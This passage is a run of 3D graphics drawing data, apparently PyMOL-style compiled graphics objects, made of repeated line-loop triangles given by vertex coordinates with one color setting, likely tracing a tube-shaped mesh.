VERTEX, 17.373, 41.100, 28.905,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.094, 41.089, 28.727,
VERTEX, 17.373, 41.100, 28.905,
VERTEX, 17.248, 41.195, 28.593,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.373, 41.100, 28.905,
VERTEX, 17.248, 41.195, 28.593,
VERTEX, 17.513, 41.220, 28.768,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.248, 41.195, 28.593,
VERTEX, 17.513, 41.220, 28.768,
VERTEX, 17.327, 41.410, 28.575,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.513, 41.220, 28.768,
VERTEX, 17.327, 41.410, 28.575,
VERTEX, 17.588, 41.437, 28.763,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.327, 41.410, 28.575,
VERTEX, 17.588, 41.437, 28.763,
VERTEX, 17.285, 41.608, 28.683,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.588, 41.437, 28.763,
VERTEX, 17.285, 41.608, 28.683,
VERTEX, 17.555, 41.623, 28.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.285, 41.608, 28.683,
VERTEX, 17.555, 41.623, 28.893,
VERTEX, 17.146, 41.673, 28.853,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.555, 41.623, 28.893,
VERTEX, 17.146, 41.673, 28.853,
VERTEX, 17.434, 41.670, 29.082,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.434, 41.670, 29.082,
VERTEX, 17.743, 41.615, 29.288,
VERTEX, 17.294, 41.550, 29.219,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.743, 41.615, 29.288,
VERTEX, 17.294, 41.550, 29.219,
VERTEX, 17.617, 41.481, 29.425,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.294, 41.550, 29.219,
VERTEX, 17.617, 41.481, 29.425,
VERTEX, 17.219, 41.333, 29.224,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.617, 41.481, 29.425,
VERTEX, 17.219, 41.333, 29.224,
VERTEX, 17.544, 41.264, 29.418,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.219, 41.333, 29.224,
VERTEX, 17.544, 41.264, 29.418,
VERTEX, 17.252, 41.146, 29.094,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.544, 41.264, 29.418,
VERTEX, 17.252, 41.146, 29.094,
VERTEX, 17.566, 41.090, 29.270,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.252, 41.146, 29.094,
VERTEX, 17.566, 41.090, 29.270,
VERTEX, 17.373, 41.100, 28.905,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.566, 41.090, 29.270,
VERTEX, 17.373, 41.100, 28.905,
VERTEX, 17.671, 41.061, 29.067,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.373, 41.100, 28.905,
VERTEX, 17.671, 41.061, 29.067,
VERTEX, 17.513, 41.220, 28.768,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.671, 41.061, 29.067,
VERTEX, 17.513, 41.220, 28.768,
VERTEX, 17.797, 41.195, 28.930,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.513, 41.220, 28.768,
VERTEX, 17.797, 41.195, 28.930,
VERTEX, 17.588, 41.437, 28.763,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.797, 41.195, 28.930,
VERTEX, 17.588, 41.437, 28.763,
VERTEX, 17.870, 41.412, 28.937,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.588, 41.437, 28.763,
VERTEX, 17.870, 41.412, 28.937,
VERTEX, 17.555, 41.623, 28.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.870, 41.412, 28.937,
VERTEX, 17.555, 41.623, 28.893,
VERTEX, 17.848, 41.586, 29.085,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.555, 41.623, 28.893,
VERTEX, 17.848, 41.586, 29.085,
VERTEX, 17.434, 41.670, 29.082,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.848, 41.586, 29.085,
VERTEX, 17.434, 41.670, 29.082,
VERTEX, 17.743, 41.615, 29.288,
END,
COLOR, 0.000, 0.933, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 17.743, 41.615, 29.288,
VERTEX, 18.078, 41.518, 29.470,
VERTEX, 17.617, 41.481, 29.425,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.078, 41.518, 29.470,
VERTEX, 17.617, 41.481, 29.425,
VERTEX, 17.965, 41.372, 29.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.617, 41.481, 29.425,
VERTEX, 17.965, 41.372, 29.605,
VERTEX, 17.544, 41.264, 29.418,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.965, 41.372, 29.605,
VERTEX, 17.544, 41.264, 29.418,
VERTEX, 17.893, 41.154, 29.585,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.544, 41.264, 29.418,
VERTEX, 17.893, 41.154, 29.585,
VERTEX, 17.566, 41.090, 29.270,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.893, 41.154, 29.585,
VERTEX, 17.566, 41.090, 29.270,
VERTEX, 17.906, 40.994, 29.421,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.566, 41.090, 29.270,
VERTEX, 17.906, 40.994, 29.421,
VERTEX, 17.671, 41.061, 29.067,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.906, 40.994, 29.421,
VERTEX, 17.671, 41.061, 29.067,
VERTEX, 17.995, 40.984, 29.209,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.671, 41.061, 29.067,
VERTEX, 17.995, 40.984, 29.209,
VERTEX, 17.797, 41.195, 28.930,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.995, 40.984, 29.209,
VERTEX, 17.797, 41.195, 28.930,
VERTEX, 18.108, 41.131, 29.074,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.797, 41.195, 28.930,
VERTEX, 18.108, 41.131, 29.074,
VERTEX, 17.870, 41.412, 28.937,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.108, 41.131, 29.074,
VERTEX, 17.870, 41.412, 28.937,
VERTEX, 18.180, 41.348, 29.094,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.870, 41.412, 28.937,
VERTEX, 18.180, 41.348, 29.094,
VERTEX, 17.848, 41.586, 29.085,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.180, 41.348, 29.094,
VERTEX, 17.848, 41.586, 29.085,
VERTEX, 18.167, 41.509, 29.258,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.848, 41.586, 29.085,
VERTEX, 18.167, 41.509, 29.258,
VERTEX, 17.743, 41.615, 29.288,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.167, 41.509, 29.258,
VERTEX, 17.743, 41.615, 29.288,
VERTEX, 18.078, 41.518, 29.470,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.078, 41.518, 29.470,
VERTEX, 18.447, 41.391, 29.626,
VERTEX, 17.965, 41.372, 29.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.447, 41.391, 29.626,
VERTEX, 17.965, 41.372, 29.605,
VERTEX, 18.345, 41.231, 29.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.965, 41.372, 29.605,
VERTEX, 18.345, 41.231, 29.756,
VERTEX, 17.893, 41.154, 29.585,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.345, 41.231, 29.756,
VERTEX, 17.893, 41.154, 29.585,
VERTEX, 18.274, 41.015, 29.722,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.893, 41.154, 29.585,
VERTEX, 18.274, 41.015, 29.722,
VERTEX, 17.906, 40.994, 29.421,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.274, 41.015, 29.722,
VERTEX, 17.906, 40.994, 29.421,
VERTEX, 18.277, 40.869, 29.544,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.906, 40.994, 29.421,
VERTEX, 18.277, 40.869, 29.544,
VERTEX, 17.995, 40.984, 29.209,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.277, 40.869, 29.544,
VERTEX, 17.995, 40.984, 29.209,
VERTEX, 18.351, 40.880, 29.327,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.995, 40.984, 29.209,
VERTEX, 18.351, 40.880, 29.327,
VERTEX, 18.108, 41.131, 29.074,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.351, 40.880, 29.327,
VERTEX, 18.108, 41.131, 29.074,
VERTEX, 18.453, 41.040, 29.197,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.108, 41.131, 29.074,
VERTEX, 18.453, 41.040, 29.197,
VERTEX, 18.180, 41.348, 29.094,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.453, 41.040, 29.197,
VERTEX, 18.180, 41.348, 29.094,
VERTEX, 18.523, 41.256, 29.232,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.180, 41.348, 29.094,
VERTEX, 18.523, 41.256, 29.232,
VERTEX, 18.167, 41.509, 29.258,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.523, 41.256, 29.232,
VERTEX, 18.167, 41.509, 29.258,
VERTEX, 18.521, 41.401, 29.409,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.167, 41.509, 29.258,
VERTEX, 18.521, 41.401, 29.409,
VERTEX, 18.078, 41.518, 29.470,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.521, 41.401, 29.409,
VERTEX, 18.078, 41.518, 29.470,
VERTEX, 18.447, 41.391, 29.626,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.447, 41.391, 29.626,
VERTEX, 18.854, 41.241, 29.756,
VERTEX, 18.345, 41.231, 29.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.854, 41.241, 29.756,
VERTEX, 18.345, 41.231, 29.756,
VERTEX, 18.763, 41.068, 29.876,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.345, 41.231, 29.756,
VERTEX, 18.763, 41.068, 29.876,
VERTEX, 18.274, 41.015, 29.722,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.763, 41.068, 29.876,
VERTEX, 18.274, 41.015, 29.722,
VERTEX, 18.693, 40.855, 29.826,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.274, 41.015, 29.722,
VERTEX, 18.693, 40.855, 29.826,
VERTEX, 18.277, 40.869, 29.544,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.693, 40.855, 29.826,
VERTEX, 18.277, 40.869, 29.544,
VERTEX, 18.687, 40.727, 29.635,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.277, 40.869, 29.544,
VERTEX, 18.687, 40.727, 29.635,
VERTEX, 18.351, 40.880, 29.327,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.687, 40.727, 29.635,
VERTEX, 18.351, 40.880, 29.327,
VERTEX, 18.747, 40.759, 29.416,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.351, 40.880, 29.327,
VERTEX, 18.747, 40.759, 29.416,
VERTEX, 18.453, 41.040, 29.197,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.747, 40.759, 29.416,
VERTEX, 18.453, 41.040, 29.197,
VERTEX, 18.838, 40.933, 29.296,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.453, 41.040, 29.197,
VERTEX, 18.838, 40.933, 29.296,
VERTEX, 18.523, 41.256, 29.232,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.838, 40.933, 29.296,
VERTEX, 18.523, 41.256, 29.232,
VERTEX, 18.907, 41.146, 29.346,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.523, 41.256, 29.232,
VERTEX, 18.907, 41.146, 29.346,
VERTEX, 18.521, 41.401, 29.409,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.907, 41.146, 29.346,
VERTEX, 18.521, 41.401, 29.409,
VERTEX, 18.914, 41.274, 29.537,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.521, 41.401, 29.409,
VERTEX, 18.914, 41.274, 29.537,
VERTEX, 18.447, 41.391, 29.626,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.914, 41.274, 29.537,
VERTEX, 18.447, 41.391, 29.626,
VERTEX, 18.854, 41.241, 29.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.854, 41.241, 29.756,
VERTEX, 19.305, 41.080, 29.857,
VERTEX, 18.763, 41.068, 29.876,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.305, 41.080, 29.857,
VERTEX, 18.763, 41.068, 29.876,
VERTEX, 19.225, 40.892, 29.962,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.763, 41.068, 29.876,
VERTEX, 19.225, 40.892, 29.962,
VERTEX, 18.693, 40.855, 29.826,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.225, 40.892, 29.962,
VERTEX, 18.693, 40.855, 29.826,
VERTEX, 19.157, 40.684, 29.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.693, 40.855, 29.826,
VERTEX, 19.157, 40.684, 29.893,
VERTEX, 18.687, 40.727, 29.635,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.157, 40.684, 29.893,
VERTEX, 18.687, 40.727, 29.635,
VERTEX, 19.143, 40.577, 29.691,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.687, 40.727, 29.635,
VERTEX, 19.143, 40.577, 29.691,
VERTEX, 18.747, 40.759, 29.416,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.143, 40.577, 29.691,
VERTEX, 18.747, 40.759, 29.416,
VERTEX, 19.189, 40.634, 29.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.747, 40.759, 29.416,
VERTEX, 19.189, 40.634, 29.473,
VERTEX, 18.838, 40.933, 29.296,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.189, 40.634, 29.473,
VERTEX, 18.838, 40.933, 29.296,
VERTEX, 19.269, 40.822, 29.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.838, 40.933, 29.296,
VERTEX, 19.269, 40.822, 29.368,
VERTEX, 18.907, 41.146, 29.346,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.269, 40.822, 29.368,
VERTEX, 18.907, 41.146, 29.346,
VERTEX, 19.337, 41.030, 29.437,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.907, 41.146, 29.346,
VERTEX, 19.337, 41.030, 29.437,
VERTEX, 18.914, 41.274, 29.537,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.337, 41.030, 29.437,
VERTEX, 18.914, 41.274, 29.537,
VERTEX, 19.352, 41.137, 29.640,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.914, 41.274, 29.537,
VERTEX, 19.352, 41.137, 29.640,
VERTEX, 18.854, 41.241, 29.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.352, 41.137, 29.640,
VERTEX, 18.854, 41.241, 29.756,
VERTEX, 19.305, 41.080, 29.857,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.305, 41.080, 29.857,
VERTEX, 19.808, 40.916, 29.926,
VERTEX, 19.225, 40.892, 29.962,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.808, 40.916, 29.926,
VERTEX, 19.225, 40.892, 29.962,
VERTEX, 19.741, 40.713, 30.011,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.225, 40.892, 29.962,
VERTEX, 19.741, 40.713, 30.011,
VERTEX, 19.157, 40.684, 29.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.741, 40.713, 30.011,
VERTEX, 19.157, 40.684, 29.893,
VERTEX, 19.677, 40.512, 29.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.157, 40.684, 29.893,
VERTEX, 19.677, 40.512, 29.920,
VERTEX, 19.143, 40.577, 29.691,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.677, 40.512, 29.920,
VERTEX, 19.143, 40.577, 29.691,
VERTEX, 19.653, 40.431, 29.707,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.143, 40.577, 29.691,
VERTEX, 19.653, 40.431, 29.707,
VERTEX, 19.189, 40.634, 29.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.653, 40.431, 29.707,
VERTEX, 19.189, 40.634, 29.473,
VERTEX, 19.684, 40.516, 29.496,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.189, 40.634, 29.473,
VERTEX, 19.684, 40.516, 29.496,
VERTEX, 19.269, 40.822, 29.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.684, 40.516, 29.496,
VERTEX, 19.269, 40.822, 29.368,
VERTEX, 19.751, 40.719, 29.411,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.269, 40.822, 29.368,
VERTEX, 19.751, 40.719, 29.411,
VERTEX, 19.337, 41.030, 29.437,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.751, 40.719, 29.411,
VERTEX, 19.337, 41.030, 29.437,
VERTEX, 19.815, 40.920, 29.502,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.337, 41.030, 29.437,
VERTEX, 19.815, 40.920, 29.502,
VERTEX, 19.352, 41.137, 29.640,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.815, 40.920, 29.502,
VERTEX, 19.352, 41.137, 29.640,
VERTEX, 19.839, 41.001, 29.715,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.352, 41.137, 29.640,
VERTEX, 19.839, 41.001, 29.715,
VERTEX, 19.305, 41.080, 29.857,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.839, 41.001, 29.715,
VERTEX, 19.305, 41.080, 29.857,
VERTEX, 19.808, 40.916, 29.926,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.808, 40.916, 29.926,
VERTEX, 20.305, 40.776, 29.941,
VERTEX, 19.741, 40.713, 30.011,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.305, 40.776, 29.941,
VERTEX, 19.741, 40.713, 30.011,
VERTEX, 20.256, 40.561, 30.003,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.741, 40.713, 30.011,
VERTEX, 20.256, 40.561, 30.003,
VERTEX, 19.677, 40.512, 29.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.256, 40.561, 30.003,
VERTEX, 19.677, 40.512, 29.920,
VERTEX, 20.195, 40.370, 29.891,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.677, 40.512, 29.920,
VERTEX, 20.195, 40.370, 29.891,
VERTEX, 19.653, 40.431, 29.707,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.195, 40.370, 29.891,
VERTEX, 19.653, 40.431, 29.707,
VERTEX, 20.157, 40.315, 29.671,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.653, 40.431, 29.707,
VERTEX, 20.157, 40.315, 29.671,
VERTEX, 19.684, 40.516, 29.496,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.157, 40.315, 29.671,
VERTEX, 19.684, 40.516, 29.496,
VERTEX, 20.166, 40.429, 29.472,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.684, 40.516, 29.496,
VERTEX, 20.166, 40.429, 29.472,
VERTEX, 19.751, 40.719, 29.411,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.166, 40.429, 29.472,
VERTEX, 19.751, 40.719, 29.411,
VERTEX, 20.215, 40.645, 29.410,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.751, 40.719, 29.411,
VERTEX, 20.215, 40.645, 29.410,
VERTEX, 19.815, 40.920, 29.502,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.215, 40.645, 29.410,
VERTEX, 19.815, 40.920, 29.502,
VERTEX, 20.276, 40.836, 29.522,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.815, 40.920, 29.502,
VERTEX, 20.276, 40.836, 29.522,
VERTEX, 19.839, 41.001, 29.715,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.276, 40.836, 29.522,
VERTEX, 19.839, 41.001, 29.715,
VERTEX, 20.313, 40.890, 29.742,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.839, 41.001, 29.715,
VERTEX, 20.313, 40.890, 29.742,
VERTEX, 19.808, 40.916, 29.926,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.313, 40.890, 29.742,
VERTEX, 19.808, 40.916, 29.926,
VERTEX, 20.305, 40.776, 29.941,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.305, 40.776, 29.941,
VERTEX, 20.737, 40.674, 29.892,
VERTEX, 20.256, 40.561, 30.003,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.737, 40.674, 29.892,
VERTEX, 20.256, 40.561, 30.003,
VERTEX, 20.707, 40.450, 29.931,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.256, 40.561, 30.003,
VERTEX, 20.707, 40.450, 29.931,
VERTEX, 20.195, 40.370, 29.891,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.707, 40.450, 29.931,
VERTEX, 20.195, 40.370, 29.891,
VERTEX, 20.648, 40.269, 29.802,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.195, 40.370, 29.891,
VERTEX, 20.648, 40.269, 29.802,
VERTEX, 20.157, 40.315, 29.671,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.648, 40.269, 29.802,
VERTEX, 20.157, 40.315, 29.671,
VERTEX, 20.594, 40.238, 29.581,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.157, 40.315, 29.671,
VERTEX, 20.594, 40.238, 29.581,
VERTEX, 20.166, 40.429, 29.472,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.594, 40.238, 29.581,
VERTEX, 20.166, 40.429, 29.472,
VERTEX, 20.577, 40.375, 29.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.166, 40.429, 29.472,
VERTEX, 20.577, 40.375, 29.397,
VERTEX, 20.215, 40.645, 29.410,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.577, 40.375, 29.397,
VERTEX, 20.215, 40.645, 29.410,
VERTEX, 20.607, 40.599, 29.358,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.215, 40.645, 29.410,
VERTEX, 20.607, 40.599, 29.358,
VERTEX, 20.276, 40.836, 29.522,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.607, 40.599, 29.358,
VERTEX, 20.276, 40.836, 29.522,
VERTEX, 20.666, 40.780, 29.487,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.276, 40.836, 29.522,
VERTEX, 20.666, 40.780, 29.487,
VERTEX, 20.313, 40.890, 29.742,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.666, 40.780, 29.487,
VERTEX, 20.313, 40.890, 29.742,
VERTEX, 20.720, 40.811, 29.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.313, 40.890, 29.742,
VERTEX, 20.720, 40.811, 29.708,
VERTEX, 20.305, 40.776, 29.941,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.720, 40.811, 29.708,
VERTEX, 20.305, 40.776, 29.941,
VERTEX, 20.737, 40.674, 29.892,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.737, 40.674, 29.892,
VERTEX, 21.111, 40.594, 29.792,
VERTEX, 20.707, 40.450, 29.931,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.111, 40.594, 29.792,
VERTEX, 20.707, 40.450, 29.931,
VERTEX, 21.096, 40.366, 29.809,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.707, 40.450, 29.931,
VERTEX, 21.096, 40.366, 29.809,
VERTEX, 20.648, 40.269, 29.802,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.096, 40.366, 29.809,
VERTEX, 20.648, 40.269, 29.802,
VERTEX, 21.037, 40.196, 29.666,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.648, 40.269, 29.802,
VERTEX, 21.037, 40.196, 29.666,
VERTEX, 20.594, 40.238, 29.581,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.037, 40.196, 29.666,
VERTEX, 20.594, 40.238, 29.581,
VERTEX, 20.970, 40.184, 29.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.594, 40.238, 29.581,
VERTEX, 20.970, 40.184, 29.447,
VERTEX, 20.577, 40.375, 29.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.970, 40.184, 29.447,
VERTEX, 20.577, 40.375, 29.397,
VERTEX, 20.934, 40.337, 29.280,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.577, 40.375, 29.397,
VERTEX, 20.934, 40.337, 29.280,
VERTEX, 20.607, 40.599, 29.358,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.934, 40.337, 29.280,
VERTEX, 20.607, 40.599, 29.358,
VERTEX, 20.949, 40.565, 29.263,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.607, 40.599, 29.358,
VERTEX, 20.949, 40.565, 29.263,
VERTEX, 20.666, 40.780, 29.487,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.949, 40.565, 29.263,
VERTEX, 20.666, 40.780, 29.487,
VERTEX, 21.007, 40.735, 29.405,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.666, 40.780, 29.487,
VERTEX, 21.007, 40.735, 29.405,
VERTEX, 20.720, 40.811, 29.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.007, 40.735, 29.405,
VERTEX, 20.720, 40.811, 29.708,
VERTEX, 21.075, 40.747, 29.625,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.720, 40.811, 29.708,
VERTEX, 21.075, 40.747, 29.625,
VERTEX, 20.737, 40.674, 29.892,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.075, 40.747, 29.625,
VERTEX, 20.737, 40.674, 29.892,
VERTEX, 21.111, 40.594, 29.792,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.111, 40.594, 29.792,
VERTEX, 21.434, 40.520, 29.656,
VERTEX, 21.096, 40.366, 29.809,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.434, 40.520, 29.656,
VERTEX, 21.096, 40.366, 29.809,
VERTEX, 21.425, 40.291, 29.655,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.096, 40.366, 29.809,
VERTEX, 21.425, 40.291, 29.655,
VERTEX, 21.037, 40.196, 29.666,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.425, 40.291, 29.655,
VERTEX, 21.037, 40.196, 29.666,
VERTEX, 21.367, 40.131, 29.500,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.037, 40.196, 29.666,
VERTEX, 21.367, 40.131, 29.500,
VERTEX, 20.970, 40.184, 29.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.367, 40.131, 29.500,
VERTEX, 20.970, 40.184, 29.447,
VERTEX, 21.294, 40.135, 29.283,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.970, 40.184, 29.447,
VERTEX, 21.294, 40.135, 29.283,
VERTEX, 20.934, 40.337, 29.280,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.294, 40.135, 29.283,
VERTEX, 20.934, 40.337, 29.280,
VERTEX, 21.249, 40.300, 29.129,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.934, 40.337, 29.280,
VERTEX, 21.249, 40.300, 29.129,
VERTEX, 20.949, 40.565, 29.263,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.249, 40.300, 29.129,
VERTEX, 20.949, 40.565, 29.263,
VERTEX, 21.258, 40.530, 29.130,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.949, 40.565, 29.263,
VERTEX, 21.258, 40.530, 29.130,
VERTEX, 21.007, 40.735, 29.405,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.258, 40.530, 29.130,
VERTEX, 21.007, 40.735, 29.405,
VERTEX, 21.316, 40.689, 29.285,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.007, 40.735, 29.405,
VERTEX, 21.316, 40.689, 29.285,
VERTEX, 21.075, 40.747, 29.625,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.316, 40.689, 29.285,
VERTEX, 21.075, 40.747, 29.625,
VERTEX, 21.389, 40.685, 29.503,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.075, 40.747, 29.625,
VERTEX, 21.389, 40.685, 29.503,
VERTEX, 21.111, 40.594, 29.792,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.389, 40.685, 29.503,
VERTEX, 21.111, 40.594, 29.792,
VERTEX, 21.434, 40.520, 29.656,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.434, 40.520, 29.656,
VERTEX, 21.716, 40.434, 29.497,
VERTEX, 21.425, 40.291, 29.655,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.716, 40.434, 29.497,
VERTEX, 21.425, 40.291, 29.655,
VERTEX, 21.702, 40.205, 29.482,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.425, 40.291, 29.655,
VERTEX, 21.702, 40.205, 29.482,
VERTEX, 21.367, 40.131, 29.500,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.702, 40.205, 29.482,
VERTEX, 21.367, 40.131, 29.500,
VERTEX, 21.643, 40.057, 29.317,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.367, 40.131, 29.500,
VERTEX, 21.643, 40.057, 29.317,
VERTEX, 21.294, 40.135, 29.283,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.643, 40.057, 29.317,
VERTEX, 21.294, 40.135, 29.283,
VERTEX, 21.575, 40.076, 29.099,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.294, 40.135, 29.283,
VERTEX, 21.575, 40.076, 29.099,
VERTEX, 21.249, 40.300, 29.129,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.575, 40.076, 29.099,
VERTEX, 21.249, 40.300, 29.129,
